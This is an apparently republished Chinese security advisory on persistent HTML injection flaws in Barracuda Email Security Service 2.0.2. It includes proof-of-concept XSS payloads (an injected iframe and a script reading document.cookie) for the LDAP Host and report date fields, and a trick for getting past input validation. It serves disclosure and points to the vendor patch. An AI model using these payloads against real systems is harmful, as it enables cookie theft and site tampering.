发布日期:2012-08-02
更新日期:2012-08-08受影响系统:
Barracuda Networks Email Security Service 2.0.2
Barracuda Networks Email Security Service
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54773Barracuda Email Security Service 是基于云的电子邮件安全服务。Barracuda Email Security Service 2.0.2及其他版本在实现上存在多个HTML注入漏洞,攻击者可利用这些漏洞注入恶意HTML和脚本代码,从而窃取Cookie身份验证凭证或控制站点外观。<*来源:Benjamin Kunz Mejri
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Benjamin Kunz Mejri ()提供了如下测试方法:
Proof of Concept:
=================
1.1
The persistent web vulnerability can be exploited by remote attackers with privileged user account & low user inter action.
For demonstration or reproduce ...Review: Domain Settings > Directory Services > LDAP Host<div id="directory-services" class="module">
<h4 class="module-title">Directory Services</h4>
<div class="module-content">
<div class="warn notice" id="ldap-test-result" style=""><img src="/images/spinner1.gif"
alt="loading..."> Connecting to >"<iframe src="http://www.example1.com">@gmail.com >"<script>alert(document.cookie)</script><div style="1@gmail.com 0</iframe></div>
<div style="float: right;">
<a href="https://www.example2.com/domains/sync_ldap/4" class="btn"><span><span>Synchronize Now</span></span></a>
<a href="#" class="btn" id="ldap-test-btn"><span><span>Test Settings</span></span></a>
</div>
<p class="field">
<label class="label" for="ldap_host">LDAP Host:</label>
<input name="ldap_host" id="ldap_host" size="30" value=">
"<iframe src=http://www.example1.com>@gmail.com >"<script>alert(document.cookie)</script><
div style="1@gmail.com 0" type="text">URL: https://www.example.com/domains/info/4PoC: >">"<iframe src=http://www.example1.com>VL >"<div style="1 >">"Note:
To bypass the validation close the tag of the exception handling on beginning with double quotes 2 times.
The mask of the exception (>") will be bypassed and the string will be executed out of the secure exception handling message. 1.2
The persistent web vulnerability can be exploited by remote attackers with privileged user account & low user inter action.
For demonstration or reproduce ...Vulnerable Module: Reports > Date Start > Date EndPoC: >"<iframe src=http://www.example1.com>URL: https://www.example.com/reportsNote:
1. Include a start Date & End Date
2. Inject after the start date & end date your own persistent script code
3. Result: The script code get executed out of the date listing application context
4. Save value with script code to events for exploitation via module.建议:
--------------------------------------------------------------------------------
厂商补丁:Barracuda Networks
------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.barracudanetworks.com/ns/products/spam_overview.phpCisco IOS远程拒绝服务漏洞(CVE-2012-1344)meetOneToGo纯文本凭证信息泄露漏洞相关资讯 HTML注入漏洞
- Symantec Security Information (07/05/2013 16:04:54)
- Django CMS "page_attribute" (01/29/2013 10:18:23)
- IBM Intelligent Operations (12/20/2012 08:24:59)
| - TP-Link TL-WA701N和TL-WA701ND目 (03/01/2013 21:04:10)
- Advantech WebAccess HMI/SCADA (01/10/2013 08:07:25)
- MyBB User Profile Skype ID插件“ (12/19/2012 18:55:16)
|
本文评论 查看全部评论 (1)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
| |
易网时代-编程资源站